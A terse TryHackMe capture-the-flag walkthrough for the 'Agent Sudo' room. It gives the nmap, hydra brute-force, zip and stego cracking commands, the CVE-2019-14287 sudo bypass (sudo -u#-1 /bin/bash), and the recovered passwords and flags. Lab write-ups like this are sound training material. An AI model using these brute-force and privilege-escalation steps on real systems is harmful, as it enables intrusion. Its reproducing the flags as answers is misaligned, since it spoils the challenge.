Agent Sudo

https://tryhackme.com/room/agentsudoctf

INIT

export agentsudo=10.10.172.140
ping $agentsudo

echo "10.10.172.140 agentsudo.thm" >> /etc/hosts

Task 2 Enumerate

nmap -v -sC -sV -O -T5 -p1-65535 agentsudo.thm

How many open ports?

3

How you redirect yourself to a secret page?

Switch User-Agent to C

User-Agent

What is the agent name?

Chris

Task 3 Hash cracking and brute-force

FTP password

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://agentsudo.thm -t 50

crystal

Zip file password

binwalk -e cutie.png

zip2john 8702.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt

alien

steg password

steghide extract -sf cute-alien.jpg

Area51

Who is the other agent (in full name)?

james

SSH password

hackerrules!

Task 4 Capture the user flag

What is the user flag?

b03d975e8c92a7c04146cfa7a5a313c7

What is the incident of the photo called?

scp james@agentsudo.thm:/home/james/Alien_autospy.jpg .

Roswell Alien Autopsy

Task 5 Privilege escalation

sudo -l

CVE number for the escalation

CVE-2019-14287

What is the root flag?

sudo -u#-1 /bin/bash
cat /root/root.txt

b53a02f55b57d4439e3341834d70c062

(Bonus) Who is Agent R?

DesKel